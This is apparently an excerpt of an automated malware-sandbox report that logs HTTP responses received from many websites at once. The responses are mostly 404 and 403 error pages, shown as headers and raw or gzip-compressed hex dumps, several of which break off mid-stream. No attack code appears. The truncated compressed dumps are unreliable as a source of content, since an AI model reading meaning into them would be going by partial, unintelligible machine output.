Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: ApacheLast-Modified: Wed, 21 Mar 2018 06:16:02 GMTETag: "696-567e62015ec80"Accept-Ranges: bytesContent-Length: 1686Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: nginx/1.21.6Content-Type: text/html; charset=UTF-8Content-Length: 7939Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Set-Cookie: PHPSESSID=acf8463445dc8fdfa0358960121e753c; path=/Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGo
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:15 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-37.ec2.internalX-Request-Id: ba67debb-743f-4052-a9cb-23bd9813b17bData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:15 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Tue, 20 Feb 2024 23:26:15 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:15 GMTContent-Length: 45174Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 64 69 76 2c 0a 20 20 20 20 20 20 73 70 61 6e 2c 0a 20 20 20 20 20 20 61 70 70 6c 65 74 2c 0a 20 20 20 20 20 20 6f 62 6a 65 63 74 2c 0a 20 20 20 20 20 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 68 33 2c 0a 20 20 20 20 20 20 68 34 2c 0a 20 20 20 20 20 20 68 35 2c 0a 20 20 20 20 20 20 68 36 2c 0a 20 20 20 20 20 20 70 2c 0a 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 20 20 20 20 20 20 70 72 65 2c 0a 20 20 20 20 20 20 61 2c 0a 20 20 20 20 20 20 61 62 62 72 2c 0a 20 20 20 20 20 20 61 63 72 6f 6e 79 6d 2c 0a 20 20 20 20 20 20 61 64 64 72 65 73 73 2c 0a 20 20 20 20 20 20 62 69 67 2c 0a 20 20 20 20 20 20 63 69 74 65 2c 0a 20 20 20 20 20 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 64 65 6c 2c 0a 20 20 20 20 20 20 64 66 6e 2c 0a 20 20 20 20 20 20 65 6d 2c 0a 20 20 20 20 20 20 69 6d 67 2c 0a 20 20 20 20 20 20 69 6e 73 2c 0a 20 20 20 20 20 20 6b 62 64 2c 0a 20 20 20 20 20 20 71 2c 0a 20 20 20 20 20 20 73 2c 0a 20 20 20 20 20 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 73 6d 61 6c 6c 2c 0a 20 20 20 20 20 20 73 74 72 69 6b 65 2c 0a 20 20 20
